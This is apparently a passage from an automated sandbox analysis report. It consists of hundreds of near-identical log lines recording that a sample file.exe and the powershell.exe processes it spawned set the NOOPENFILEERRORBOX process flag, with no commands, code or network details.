                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
